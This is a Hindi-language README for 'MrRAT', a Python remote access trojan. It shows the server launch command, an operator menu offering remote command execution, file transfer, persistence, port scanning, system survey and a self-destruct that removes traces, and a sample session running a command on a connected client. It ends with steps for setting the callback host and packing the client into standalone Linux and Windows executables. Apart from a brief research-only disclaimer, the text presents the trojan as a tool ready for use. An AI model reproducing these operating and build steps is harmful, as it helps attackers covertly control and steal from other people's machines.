
🐭 यह एक क्रॉस-प्लेटफ़ॉर्म Python 2.x रिमोट एक्सेस ट्रोजन (RAT) है।
यह एक क्रॉस-प्लेटफ़ॉर्म Python 2.x रिमोट एक्सेस ट्रोजन (RAT) है, MrRAT को एक स्वच्छ डिज़ाइन वाला पूर्ण-सुविधा युक्त Python RAT बनाए रखने के लिए बनाया गया था। वर्तमान में यह एक कार्य प्रगति पर है और अभी भी सक्रिय रूप से हैक किया जा रहा है।
अस्वीकरण: यह RAT केवल शोध उद्देश्यों के लिए है, और इसे केवल अधिकृत सिस्टम पर ही उपयोग किया जाना चाहिए। बिना प्राधिकरण या स्पष्ट अनुमति के कंप्यूटर सिस्टम या नेटवर्क तक पहुँचना अवैध है।
$ python MrRAT_server.py --port 1337
/$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$$
| $$$ /$$$ | $$__ $$ /$$__ $$|__ $$__/
| $$$$ /$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/| $$$$$$$$ | $$
| $$ $$$| $$| $$ \__/| $$__ $$| $$__ $$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$ | $$
| $$ \/ | $$| $$ | $$ | $$| $$ | $$ | $$
|__/ |__/|__/ |__/ |__/|__/ |__/ |__/
, .
(\,;,/)
(o o)\//,
\ / \,
`+'( ( \ )
// \ |_./
'~' '~----'
https://github.com/user696/MrRAT
MrRAT server listening for connections on port 1337.
[?] MrRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
scan <ip> - Scan top 25 ports on a single host.
selfdestruct - Remove all traces of the RAT from the target system.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] MrRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] MrRAT> client 1
[1] MrRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
ध्यान रखें कि बनाने से पहले आप शायद MrRAT_client.py के शीर्ष पर स्थित HOST और PORT वेरिएबल्स को अपनी आवश्यकताओं के अनुसार संशोधित करना चाहेंगे।
लिनक्स पर आपको Python 2.x, PyInstaller, और pycrypto की आवश्यकता होगी। फिर कुछ इस तरह चलाएँ pyinstaller2 --onefile MrRAT_client.py और यह एक dist/ फ़ोल्डर उत्पन्न करेगा जिसमें एक स्टैंड-अलोन ELF निष्पादन योग्य होगा।
विंडोज़ पर आपको Python 2.x, PyInstaller, pycrypto, pywin32 और pefile की आवश्यकता होगी। फिर कुछ इस तरह चलाएँ C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile MrRAT_client.py और यह एक dist/ फ़ोल्डर उत्पन्न करेगा जिसमें एक स्टैंड-अलोन PE (पोर्टेबल निष्पादन योग्य) होगा।